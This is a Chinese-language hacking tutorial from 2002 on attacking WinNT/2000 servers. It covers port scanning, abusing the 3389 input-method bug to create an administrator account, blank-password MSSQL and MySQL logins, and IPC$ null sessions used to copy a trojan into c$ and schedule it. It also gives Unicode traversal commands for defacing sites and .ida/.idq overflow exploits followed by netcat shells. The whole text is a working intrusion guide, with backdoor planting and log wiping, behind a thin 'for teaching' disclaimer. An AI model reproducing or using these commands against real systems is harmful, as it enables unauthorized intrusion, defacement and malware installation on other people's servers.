| |
| WinNT2k服务器一般攻击攻击过程 本文用于教学!如果非法对他人服务器攻击,一切后果于本人没有关系! 现在WinNT/2k服务器漏洞很多,可以利用的也不少,所以一些新入手的小hacker 就看中了Win这个系统,下面说说,我以前的一些经验心得!高手免看! 首先工具:最好你要有个Nt/2k系统,哪个版本都可以 Super Scanner 一个端口扫描程序,速度很快! X-scanner 1.3 一个漏洞扫描程序包括了端口扫描,rpc扫描,CGI扫描 简单的密码测试。并且开放了插件接口代码,和可以自己来加一些漏洞资料。 并且支持Tcp/syn不同的扫描方式。 流光,呵呵,还是自己看看吧,很久都没用到哪个东西了。 sunx的 iis5hack.exe (.printf溢出)idahack.exe (.ida溢出) snake的 idq溢出 netcat.exe 也就是 nc.exe 大家都知道了吧! 一个3389客户端,可以单独分离出来。 Fontpage2000,有的时候这个也可以做为工具使用 其他的,ndde.exe,和一些shellcode,这些,我们做为下篇介绍。 sqlexec.exe 有的时候这个东西也很有用! --------------------------------------------------------------------- 1,扫描! 端口扫描,一般来说,对我们有用的端口 21,23,25,80,138/139.3389,79,1433,3306..... 也有的是木马开的端口和其他的服务,并且端口也可以更改! 以前有个3389,也就是输入法漏洞,呵呵,做肉鸡挺不错的,但现在很少了~~55 Super scanner 对台湾的地址进行扫描中,端口选择3389 然后用3389客户端进行连接后,点id的时候,把输入法点出来,然后点帮助里, ->输入法入门,后点鼠标左键,看到一个小的windows了吗。 然后我们选择 c:\winnt\system32\ 找到net.exe这个文件没有,找到后,然后创建 一个快捷方式,修改属性net.exe user hacker q1w2e3 /add 后运行,当然,没什么 反映,然后同样的方法net.exe localgroup administrators hacker /add,运行后,然后你就可以 登陆这个系统了。然后都是同一过程,放后门,kill log 或可以用上次我看到黑白发表的一篇文章,写到,到哪个小窗口的时候,我们可以写上一个ncx.exe或其他木马后门之类的软件,但不要是压缩过的,然后我们运行后....直接可以telnet ip port! 23,25端口 telnet www.xxx.com 23 or 25 我记得以前版本的sendmail 有个bug可以把passwd发到你指定的mail里,现在呢?很少了。。。 也可以来试着猜用户名和密码。。。。呵呵,但这样的人不是很多哦。 其实,可以用来做匿名邮件服务器使用.具体方法在下部介绍 79端口,我们可以了解一些用户的信息。 finger 0@www.xxx.com 得到用户信息后,可以用一些ftp破解或简单用户密码猜测或letmain(好象是这个软件吧) 80 呵呵,其实不光是做http服务来使用,可以作为端口重定向来使用,可以饶开防火墙(但不完全)呵呵,但稳定性不是很好!www.cnns.net的bingcheng 的站点 上有这个软件! 其实我们用的最多的就是80口上进行cgi/iis漏洞进行扫描! 1433,mssql服务,有个sa的用户,密码为"" 然后可以利用 sql连接工具连接 net user hack 234 /add .................. 然后net start看一下开了什么服务! 当然你也可以开启他的telnet ,3389或可以停止什么服务 具体请看net help 3306 mysql,有个root用户.密码空. 需要mysql客户端连接入.然后可以自己来编写些很小的语句就可以 做到你想做的事情. 常见的可以很好的利用的一些: Unicode/2次解码漏洞 idq/ida Phf漏洞 .printf FrontPage扩展漏洞 ……… 具体请看cgi/iis漏洞资料表 139 NETBIOS信息泄露,有可能可以使用ipc$空连接,或可以使用流光等工具进行简单用户密码猜测等. C:\>net use \\www.xxx.com \ipc$ “” /user:”” 建立空连接 C:\>net view \\www.xxx.com\ 查看文件的共享 C:\>net use \\www.xxx.com\c$ 建立一个连接通道 C:\>dir \\www.xxx.com\c$ 显示远程服务器文件 C:\>net time \\www.xxx.com 取得远程服务器时间 C:\>copy svr.exe \\www.xxx.com\c$ 复制木马到远程服务器的c$中 C:\> at time \\www.xxx.com\c$\svr.exe 指定时间运行 下面说说一些常见的漏洞进行攻击! Unicode/2次解码漏洞: 这个东西很古老了,但是前段时间的redcode/bulecode就是用的这个漏洞进行传播! 一般的就是用ie来作为攻击软件,把cmd.exe换名后,可以 使用ftp调用脚本的方法 或tftp来把木马或其他东西放到对方服务器中运行.sunx有个dll文件可以很容易的作到而且可以利用这个东西得到admin或对付一些ids.(www.521hacker.com)有详细资料. 或可以使用echo命令来写一些东西,最经典的就是root.exe?/c+echo hacker by F-king>c:\inetpub\wwwroot\index.html . fontpage 扩展漏洞,可以使用fontpage作为工具登陆到服务器修改站点文件! .printf是一个iis中映射问题,只要不使用远程打印服务的话。就可以删除 用iis5hack就可以得到一个shell,但时间不是很长,建立一个用户的时间道够了 .idq snake有个溢出程序,gui版本的好用一点,但老是dos! .ida sunx 有个溢出程序.效果还不错!10次成功一次就不错了。呵呵 :idahack www.xxx.com 80 指定sp 1 然后是shellport 我一般喜欢99-) 然后nc –vv www.xxx.com 99 或telnet www.xxx.com 99 idq基本使用一样. --------------- 入门2技巧: 看到一个站点后,telnet ip 80一下,然后看看返回值就知道什么服务器了. 比如,我不想开扫描软件,想知道有什么服务 http://www.xxx.com/.idq .ida .htr .htw msadcs.dll 有个mdac.pl的脚本可以导致攻击者远程执行你系统的命令 ......然后出现了什么,如果有这样的情况出现,我想哪个服务器 因该不是很安全的吧! -----------------好累.基本上就是这样 |
| Copyright By「黑白网络工作室」2002 All Rights Reserve |